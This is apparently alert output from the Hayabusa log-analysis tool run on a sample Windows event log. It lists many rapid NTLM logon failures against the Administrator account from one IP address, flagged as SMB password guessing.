NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OUwTyUXe8NLG7bCS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.967 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HQuDp8aZpWDANKMe : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GQKTlzx2gq9ayAtJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.061 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tCzVponBvb9mbyIr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.115 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mSwnrFv90KjN2cqj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QX5TLs2MPkia1cmk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ammLKlG1Q5awQGvN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:12.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SJ1ijJjPJbF4uFlo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mZOLnwIzpGz03Yjh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xS8U3UQNz6l0LZn0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: no6cftQ5MF1fjZ0y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5WHS6jVRnCUH0Rb5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i3oGLwrCJXJOauf6 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.477 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I1sxPrDYV3rr4pGJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Osysh2O2A3A2bN22 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FsInW9EMJZU8FOrF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ge8do8TM4GG1atMx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.641 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4w5GLbpVsAhGqCiq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:12.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8eQXeW1VpRU0ptMs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NhLosoA2parzTnW9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MCFTP4gVGEKFKuRI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ALrDwJz2cta9fcXB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZZNXGw28osMQLjub : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.882 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4wQzvMnwYuEQRO7V : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UloOAIgGuj6NecfR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cVSeLo2PRgGmf83Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SaCFO8CPFLuERugV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QCwV1D4L5BDZSriK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.090 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QPhLQsM4R2ua4SxW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:13.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fwgp52JNi7xnTxpN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j2GutBDenjweAluz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.250 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wflcgg5ebqu8hHGL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jXaaYSU2pakw6IsK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BfJnBv3eA8wZttML : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kOXSI0jPfbvW4dAg : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8JW6aX5mNz7cETsl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.478 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NVuJLXJzlVnDLT4Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WtSwhwnApnPI9AkO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.568 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1peOkjbd1WXGEAAM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Tbw3V9MtLIcxr65R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:13.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CEZ2v1f6t0luDj4D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.689 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R0omMppAFlFhE1mG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.734 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0jMvVN9eSeGW3zcN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.782 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HnFNYabbO7IpbVku : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8KtyTTNdqVikZGYY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DCChjnFv2hMXXwgW : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FvIYRZSomaJYJOH5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FEirUFRscaOwTuAg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RwQgMM9H1oN4te9Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JbGILYTcFwtYbDk1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p5KzNsgWvyUhNEHd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:14.213 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KGvwbOtP3A5eDKCZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YZvtNNX511hIleST : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.299 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lJBRTeW6OQtNrt5u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hovgq99STVt2GzrO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4kpT3gf0VCAVuVSa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tiB04AvkYp0PP3n1 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.479 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PPluKgaiT10oC35V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8nCOM9uUeqv9QBx6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dSPrrNCh2FSWZKbI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.621 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aLDnCjr4pSdKAMX7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: G0UnmfB7lcXKEAvn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:14.722 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ogjMSxcUw7cF5dMa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 75uB8ejsSV5CbagM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5MMHLnyrzBQxluHn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5QXLn6fpmR52RBAz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KcdlrSUzcFNpaK5v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.944 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VJjiRO5rJzZ8XtqP : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:14.986 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ncBraDdG2htkHjXU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.033 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Lo9DNrL44Z2S2SYR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QKcFiKC5QiIoHtxy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sqvq9GwuPCO15lUV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4XzgtJ3qUmkFiIY5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
